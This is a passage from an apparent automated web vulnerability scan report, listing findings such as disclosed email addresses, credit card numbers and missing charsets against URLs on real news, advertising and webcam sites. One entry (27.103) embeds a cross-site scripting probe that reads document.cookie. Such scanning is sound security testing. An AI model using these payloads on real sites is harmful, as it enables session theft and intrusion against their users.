18.901. http://www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

18.902. http://www.zvents.com/

18.903. http://www.zvents.com/albany-ny/events

19. File upload functionality

19.1. http://www.bostonherald.com/about/contact/news_tip.bg

19.2. http://www.bostonherald.com/sports/football/patriot_moments/

20. Database connection string disclosed

21. Email addresses disclosed

21.1. http://assets.nydailynews.com/js/nydn-pack-20101001.js

21.2. http://boston30.autochooser.com/results.asp

21.3. http://bostonherald.com/blogs/entertainment/the_assistant/

21.4. http://bostonherald.com/blogs/lifestyle/fork_lift/

21.5. http://bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/

21.6. http://bostonherald.com/projects/your_tax_dollars.bg

21.7. http://bostonherald.com/projects/your_tax_dollars.bg

21.8. http://bostonherald.com/sports/football/patriots/view.bg

21.9. http://bostonherald.com/track/inside_track/view.bg

21.10. http://events.cbs6albany.com/javascripts/s_code.js

21.11. http://events.cbs6albany.com/opensearch/description150.xml

21.12. http://ezsub.net/isapi/foxisapi.dll/main.sv.run

21.13. http://hosted.ap.org/static/js/prototype.js

21.14. http://jqueryui.com/about

21.15. http://support.moxiesoft.com/

21.16. http://twitter.com/LibertyHotel

21.17. http://twitter.com/ShaunieONeal

21.18. http://twitter.com/about/contact

21.19. http://twitter.com/favorites/toptweets.json

21.20. http://twitter.com/j_hollender

21.21. http://twitter.com/javascripts/widgets/widget.js

21.22. http://twitter.com/rachbarnhart

21.23. http://www.berkshireeagle.com/

21.24. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

21.25. http://www.bostonherald.com/about/contact/

21.26. http://www.bostonherald.com/about/home_delivery/

21.27. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

21.28. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

21.29. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

21.30. http://www.bostonherald.com/blogs/news/on_the_t/

21.31. http://www.bostonherald.com/business/general/view.bg

21.32. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

21.33. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

21.34. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

21.35. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

21.36. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

21.37. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

21.38. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

21.39. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

21.40. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

21.41. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

21.42. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

21.43. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

21.44. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

21.45. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

21.46. http://www.bostonherald.com/mediacenter/

21.47. http://www.bostonherald.com/mediacenter/index.php

21.48. http://www.bostonherald.com/news/opinion/

21.49. http://www.bostonherald.com/news/politics/view.bg

21.50. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

21.51. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

21.52. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

21.53. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

21.54. http://www.bostonherald.com/news/regional/gardner_heist/

21.55. http://www.bostonherald.com/news/regional/view.bg

21.56. http://www.bostonherald.com/news/regional/view.bg

21.57. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

21.58. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

21.59. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

21.60. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

21.61. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

21.62. http://www.bostonherald.com/projects/boston_pensions/

21.63. http://www.bostonherald.com/projects/bra/

21.64. http://www.bostonherald.com/projects/buybacks/

21.65. http://www.bostonherald.com/projects/consultants/

21.66. http://www.bostonherald.com/projects/edic/

21.67. http://www.bostonherald.com/projects/lawyer_pay/

21.68. http://www.bostonherald.com/projects/mta2008/

21.69. http://www.bostonherald.com/projects/payroll/brockton/

21.70. http://www.bostonherald.com/projects/payroll/cambridge/

21.71. http://www.bostonherald.com/projects/payroll/cca/

21.72. http://www.bostonherald.com/projects/payroll/mass_pike/

21.73. http://www.bostonherald.com/projects/payroll/quasi_state/

21.74. http://www.bostonherald.com/projects/payroll/quincy/

21.75. http://www.bostonherald.com/projects/payroll/springfield/

21.76. http://www.bostonherald.com/projects/payroll/suffolk/

21.77. http://www.bostonherald.com/projects/payroll/worcester/

21.78. http://www.bostonherald.com/projects/your_tax_dollars.bg

21.79. http://www.bostonherald.com/projects/your_tax_dollars.bg

21.80. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

21.81. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

21.82. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

21.83. http://www.bostonherald.com/sports/football/patriots/view.bg

21.84. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

21.85. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

21.86. http://www.bostonherald.com/store/

21.87. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

21.88. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

21.89. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

21.90. http://www.cbs6albany.com/

21.91. http://www.cbs6albany.com/albany-community/

21.92. http://www.cbs6albany.com/albany-tv-programming/

21.93. http://www.cbs6albany.com/albany-weather-forecast

21.94. http://www.cbs6albany.com/common/archives/

21.95. http://www.cbs6albany.com/common/tools/load.php

21.96. http://www.cbs6albany.com/search/

21.97. http://www.cbs6albany.com/sections/abouthdtv/

21.98. http://www.cbs6albany.com/sections/articles-map/

21.99. http://www.cbs6albany.com/sections/contactus/

21.100. http://www.cbs6albany.com/sections/contactus/newstips/

21.101. http://www.cbs6albany.com/sections/employmentopportunities/

21.102. http://www.cbs6albany.com/sections/jobsonline/

21.103. http://www.cbs6albany.com/sections/live-cameras/

21.104. http://www.cbs6albany.com/sections/local-news/

21.105. http://www.cbs6albany.com/sections/local-sports/

21.106. http://www.cbs6albany.com/sections/production-department/

21.107. http://www.cbs6albany.com/sections/publicfile/

21.108. http://www.cbs6albany.com/sections/rss/

21.109. http://www.cbs6albany.com/sections/sales/

21.110. http://www.cbs6albany.com/sections/satellitewaivers/

21.111. http://www.cbs6albany.com/sections/schoolclosures/

21.112. http://www.cbs6albany.com/sections/schoolwatch/

21.113. http://www.cbs6albany.com/sections/sitemap/

21.114. http://www.cbs6albany.com/sections/sp-alerts/

21.115. http://www.cbs6albany.com/sections/traffic-events/

21.116. http://www.cbs6albany.com/sections/traffic/

21.117. http://www.cbs6albany.com/sections/tvlistings/

21.118. http://www.cbs6albany.com/sections/videocopies/

21.119. http://www.cbs6albany.com/sections/weather/7day/

21.120. http://www.cbs6albany.com/sections/web-links/

21.121. http://www.cbs6albany.com/sections/wrgb-talent/

21.122. http://www.cbs6albany.com/sections/you-paid-for-it/

21.123. http://www.dominionenterprises.com/main/do/Privacy_Policy

21.124. http://www.dominionenterprises.com/main/do/Terms_of_Use

21.125. http://www.moxiesoft.com/

21.126. http://www.moxiesoft.com/search.aspx

21.127. http://www.moxiesoft.com/sitemap.aspx

21.128. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

21.129. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

21.130. http://www.moxiesoft.com/solutions/spaces-solutions.aspx

21.131. http://www.moxiesoft.com/tal_about/aboutus.aspx

21.132. http://www.moxiesoft.com/tal_about/careers.aspx

21.133. http://www.moxiesoft.com/tal_about/contact.aspx

21.134. http://www.moxiesoft.com/tal_about/default.aspx

21.135. http://www.moxiesoft.com/tal_about/directors.aspx

21.136. http://www.moxiesoft.com/tal_about/legal.aspx

21.137. http://www.moxiesoft.com/tal_about/management.aspx

21.138. http://www.moxiesoft.com/tal_about/partners/default.aspx

21.139. http://www.moxiesoft.com/tal_about/terms-of-use.aspx

21.140. http://www.moxiesoft.com/tal_lp/campaign.aspx

21.141. http://www.moxiesoft.com/tal_lp/default.aspx

21.142. http://www.moxiesoft.com/tal_news/awards.aspx

21.143. http://www.moxiesoft.com/tal_news/customers.aspx

21.144. http://www.moxiesoft.com/tal_news/events-resources.aspx

21.145. http://www.moxiesoft.com/tal_news/press_release.aspx

21.146. http://www.moxiesoft.com/tal_news/press_release.aspx

21.147. http://www.moxiesoft.com/tal_news/press_room.aspx

21.148. http://www.moxiesoft.com/tal_news/webinars/default.aspx

21.149. http://www.moxiesoft.com/tal_news/webinars_events.aspx

21.150. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

21.151. http://www.moxiesoft.com/tal_products/answer.aspx

21.152. http://www.moxiesoft.com/tal_products/chat.aspx

21.153. http://www.moxiesoft.com/tal_products/chat_benefits.aspx

21.154. http://www.moxiesoft.com/tal_products/chat_tour.aspx

21.155. http://www.moxiesoft.com/tal_products/chat_tour2.aspx

21.156. http://www.moxiesoft.com/tal_products/clicktocall.aspx

21.157. http://www.moxiesoft.com/tal_products/cobrowse.aspx

21.158. http://www.moxiesoft.com/tal_products/collaboration.aspx

21.159. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

21.160. http://www.moxiesoft.com/tal_products/email.aspx

21.161. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

21.162. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

21.163. http://www.moxiesoft.com/tal_products/phone.aspx

21.164. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

21.165. http://www.moxiesoft.com/tal_products/proactivechatdemo/

21.166. http://www.moxiesoft.com/tal_products/products.aspx

21.167. http://www.moxiesoft.com/tal_products/request_demo.aspx

21.168. http://www.moxiesoft.com/tal_products/request_quote.aspx

21.169. http://www.moxiesoft.com/tal_products/social-media.aspx

21.170. http://www.moxiesoft.com/tal_resources/content.aspx

21.171. http://www.moxiesoft.com/tal_resources/resource_center.aspx

21.172. http://www.moxiesoft.com/tal_services/advisory-services.aspx

21.173. http://www.moxiesoft.com/tal_services/hosting.aspx

21.174. http://www.moxiesoft.com/tal_services/implementation.aspx

21.175. http://www.moxiesoft.com/tal_services/services.aspx

21.176. http://www.moxiesoft.com/tal_services/training.aspx

21.177. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

21.178. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

21.179. https://www.paperg.com/post.php

21.180. http://www.soundingsonline.com/

21.181. http://www.soundingsonline.com/about-us

21.182. http://www.soundingsonline.com/advertise

21.183. http://www.soundingsonline.com/archives

21.184. http://www.soundingsonline.com/boat-shop

21.185. http://www.soundingsonline.com/boat-shop/know-how

21.186. http://www.soundingsonline.com/boat-shop/new-boats

21.187. http://www.soundingsonline.com/boat-shop/new-gear

21.188. http://www.soundingsonline.com/boat-shop/on-powerboats

21.189. http://www.soundingsonline.com/boat-shop/on-sailboats

21.190. http://www.soundingsonline.com/boat-shop/q-a-a

21.191. http://www.soundingsonline.com/boat-shop/sea-savvy

21.192. http://www.soundingsonline.com/boat-shop/tech-talk

21.193. http://www.soundingsonline.com/boat-shop/used-boat-review

21.194. http://www.soundingsonline.com/calendar

21.195. http://www.soundingsonline.com/career-opportunities

21.196. http://www.soundingsonline.com/columns-blogs

21.197. http://www.soundingsonline.com/columns-blogs/bay-tripper

21.198. http://www.soundingsonline.com/columns-blogs/books

21.199. http://www.soundingsonline.com/columns-blogs/new-england-fishing

21.200. http://www.soundingsonline.com/columns-blogs/under-way

21.201. http://www.soundingsonline.com/component/chronocontact/

21.202. http://www.soundingsonline.com/component/content/article/237622

21.203. http://www.soundingsonline.com/component/yvcomment/

21.204. http://www.soundingsonline.com/contact-us

21.205. http://www.soundingsonline.com/features

21.206. http://www.soundingsonline.com/features/destinations

21.207. http://www.soundingsonline.com/features/in-depth

21.208. http://www.soundingsonline.com/features/justyesterday

21.209. http://www.soundingsonline.com/features/lifestyle

21.210. http://www.soundingsonline.com/features/profiles

21.211. http://www.soundingsonline.com/features/technical

21.212. http://www.soundingsonline.com/features/type-of-boat

21.213. http://www.soundingsonline.com/index.php

21.214. http://www.soundingsonline.com/more/digital-publications

21.215. http://www.soundingsonline.com/more/the-masters-series

21.216. http://www.soundingsonline.com/news

21.217. http://www.soundingsonline.com/news/coastwise

21.218. http://www.soundingsonline.com/news/dispatches

21.219. http://www.soundingsonline.com/news/home-waters

21.220. http://www.soundingsonline.com/news/mishaps-a-rescues

21.221. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

21.222. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

21.223. http://www.soundingsonline.com/news/sailing

21.224. http://www.soundingsonline.com/news/todays-top-stories

21.225. http://www.soundingsonline.com/resources

21.226. http://www.soundingsonline.com/s_code.js

21.227. http://www.soundingsonline.com/site-map

21.228. http://www.soundingsonline.com/subscription-services

21.229. http://www.soundingsonline.com/subscription-services/preview-current-issue

21.230. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

21.231. http://www.zvents.com/javascripts/s_code.js

22. Private IP addresses disclosed

22.1. http://digg.com/submit

22.2. http://digg.com/submit

23. Credit card numbers disclosed

23.1. http://ad.doubleclick.net/adj/N3340.trfu/B4677841.19

23.2. http://local.nissanusa.com/louisville-area

23.3. http://local.nissanusa.com/miami-area

23.4. http://local.nissanusa.com/nashville-area

23.5. http://local.nissanusa.com/new-york-area

23.6. http://local.nissanusa.com/sacramento-area

24. Robots.txt file

24.1. http://ad.afy11.net/ad

24.2. https://tt3.zedo.com/

25. Cacheable HTTPS response

26. Multiple content types specified

26.1. http://base.liveperson.net/visitor/addons/deploy.asp

26.2. https://base.liveperson.net/hcp/html/chatConnLib.js

26.3. http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html

27. HTML does not specify charset

27.1. http://a.tribalfusion.com/favicon.ico

27.2. http://a.tribalfusion.com/j.ad

27.3. http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html

27.4. http://a.tribalfusion.com/p.media/aDmNYDUArTPEj5PcrsQWUy0tFmWPjM4sJ4YbvIVmqt4Av7PmMC2Hrp0WUZcpt2w4PvT3GMgTsQdVVrkSPUyTWFWTrBP2U2nWEnvVqJdPEZbLQVbAPFupRWYiWGUT5Uymodaq0EqM2tYCQVrZc4AnZapdTpTWbdXUfkUcFXxq6enq/2401306/wrapper1.html

27.5. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html

27.6. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad-cache.html/

27.7. http://a.tribalfusion.com/p.media/aEmN7EorFxPUMrXEYO5qUj5aY2nqbG1r38TtJSoAnZanVUpoWfB3Trj3tam5PvZcnb3LYVv0Ys321snMmTfP2rFVWFZbZcVm74PTU0ScUMQtjs0dvrTmvp2cY10UUZdTATn46Zb6PPnB3HUm1tYAptAy5Pn04GMdUcUjUb7YqqZccED/2413746/ad.html/

27.8. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html

27.9. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad-cache.html/

27.10. http://a.tribalfusion.com/p.media/aPmN7E0qyp2djEPGfZd4PJZcpd6oUtJb0b7bXbjeXaimRrMEUFB1Vdn1mrFrPFrsYTMp4EFa4qvQnqjBYbYbUdMRnAUBms7moWYC5EU73tIM4PvLpbvEXVnT1c300sBwnavV3bJWWUfBV6vTRTv5QVMNPHFu0tbuT9vIod4OTE/2413746/ad.html/

27.11. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad-cache.html/

27.12. http://a.tribalfusion.com/p.media/aVmN7ESG7Za4mBZapdEOTtQ8YbQ6XrBjXaysSUMGWUY4VdM4mbQpPFZboYEQo5EUi4qY3nEjIYbZbgTdf1m6vZbnc7mpHUJ2qZbh3dAr3A7Gnr3HYVfW1sYV0V7OpT7R3bMWVrnGWmj5QTM4PGUMSdJx1HJxWPrN3s3U0VQuoc5ZbBE/2413746/ad.html/

27.13. http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html

27.14. http://a.tribalfusion.com/p.media/agmNQCpTj43UZbSVbMGW673QEYYPVQpSt3N0HZbpT6MN2cr2XFZbLT6Ts4PYcRmMC4dnr1WQAntEu4m3S5GYdUcJlVVMjPP3mUWFWWrj45UauVTboTTQbPEBZdRVZbZaPFavRHMlWc3U5rTnodyqYaqO4WYHPcFH2mJys21cex/2401206/wrapper1.html

27.15. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html

27.16. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad-cache.html/

27.17. http://a.tribalfusion.com/p.media/akmN7EWUUSVtB2nrZbuPrrtXEMo4qZbg2afYnaJD1rZbaUWJQmPfJnVYsoHQC2EZbf3dIn4PfGnbMHYcURXsMU0svxmTF42bFVVUBFUAvTPE3RPsZbmSdJr1d7sT6MO2Gv4XbZbLTA6n5AUdQAbK4HQn0dnDmWZaO463Y3rnQqqU3Fp/2413746/ad.html/

27.18. http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36Yrn7XrB9XqepRUvZcTbQ4WtUWosZbAxdcios/2401306/wrapper1.html

27.19. http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html

27.20. http://ad.doubleclick.net/

27.21. http://ad.doubleclick.net/adi/N3093.130430.MINDSETMEDIA/B4053191

27.22. http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2

27.23. http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048

27.24. http://ad.doubleclick.net/adi/N3740.TribalFusion.com/B5132291.17

27.25. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10

27.26. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5

27.27. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6

27.28. http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7

27.29. http://ad.doubleclick.net/adi/N4270.Tribal_Fusion/B5094437.2

27.30. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.5

27.31. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.6

27.32. http://ad.doubleclick.net/adi/N4319.MSNMEN/B3889285.7

27.33. http://ad.doubleclick.net/adi/N4319.msn/B2087123.382

27.34. http://ad.doubleclick.net/adi/N4682.132309.BURSTMEDIA/B4421704.7

27.35. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.4

27.36. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5157804.5

27.37. http://ad.doubleclick.net/adi/N5956.Advertising.com/B3941858.17

27.38. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7

27.39. http://amch.questionmarket.com/adscgen/st.php

27.40. http://assets.nydailynews.com/img/2011/01/26/205x120-gthmb_no_makeup_menounos.jpg

27.41. http://b3.mookie1.com/2/B3DM/DLX/1@x71

27.42. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90

27.43. http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/

27.44. http://base.liveperson.net/visitor/addons/deploy.asp

27.45. https://base.liveperson.net/hcp/html/blankhtml.html

27.46. http://bh.heraldinteractive.com/includes/processAds.bg

27.47. http://boston30.autochooser.com/results.asp

27.48. http://br.imlive.com/NaN/

27.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.50. http://c.brightcove.com/services/messagebroker/amf

27.51. http://cafr.imlive.com/NaN/

27.52. http://common.onset.freedom.com/fi/adsense/

27.53. http://common.onset.freedom.com/fi/analytics/cms/

27.54. http://common.onset.freedom.com/oas/jx/

27.55. http://d3.zedo.com/jsc/d3/ff2.html

27.56. http://dm.de.mookie1.com/2/B3DM/2010DM/11076249577@x23

27.57. http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23

27.58. http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23

27.59. http://dm.de.mookie1.com/2/B3DM/2010DM/11326230958@x23

27.60. http://dm.de.mookie1.com/2/B3DM/2010DM/11370845975@x23

27.61. http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23

27.62. http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23

27.63. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23

27.64. http://dm.de.mookie1.com/2/B3DM/2010DM/11624211567@x23

27.65. http://dm.de.mookie1.com/2/B3DM/2010DM/11681620464@x23

27.66. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23

27.67. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23

27.68. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23

27.69. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23

27.70. http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23

27.71. http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23

27.72. http://dm.de.mookie1.com/2/B3DM/2010DM/11911576582@x23

27.73. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23

27.74. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23

27.75. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23

27.76. http://dm.de.mookie1.com/2/B3DM/2010DM/12119796835@x23

27.77. http://dm.de.mookie1.com/2/B3DM/2010DM/12145795389@x23

27.78. http://dm.de.mookie1.com/2/B3DM/2010DM/122038498@x23

27.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23

27.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23

27.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23

27.82. http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23

27.83. http://dm.de.mookie1.com/2/B3DM/2010DM/1682100952@x23

27.84. http://dm.de.mookie1.com/2/B3DM/2010DM/1838084819@x23

27.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1845536281@x23

27.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23

27.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23

27.88. http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95

27.89. http://dm.de.mookie1.com/2/B3DM/DLX/@x94

27.90. http://events.cbs6albany.com/site_indexes/allcurrenteventslist150m0.html

27.91. http://events.cbs6albany.com/site_indexes/allcurrentmovieslist150m0.html

27.92. http://events.cbs6albany.com/site_indexes/allvenueslist150m0.html

27.93. http://events.cbs6albany.com/site_indexes/restaurantlist150m0.html

27.94. http://events.cbs6albany.com/site_indexes/theaterlist150m0.html

27.95. http://hpi.rotator.hadj7.adjuggler.net/favicon.ico

27.96. http://ib.adnxs.com/ptj

27.97. http://ib.adnxs.com/ttj

27.98. http://imlive.com/categoryfs.asp

27.99. http://imlive.com/categoryms.asp

27.100. http://imlive.com/compliance.asp

27.101. http://imlive.com/disclaimer.asp

27.102. http://imlive.com/homepagems3.asp

27.103. http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f

27.104. http://imlive.com/liveexperts.asp

27.105. http://imlive.com/localcompanionship.asp

27.106. http://imlive.com/minglesingles.asp

27.107. http://imlive.com/pr.asp

27.108. http://imlive.com/sex_webcams_index/index.asp

27.109. http://imlive.com/sitemap.html

27.110. http://imlive.com/videosfr.asp

27.111. http://imlive.com/warningms.asp

27.112. http://jqueryui.com/about

27.113. http://jqueryui.com/themeroller/

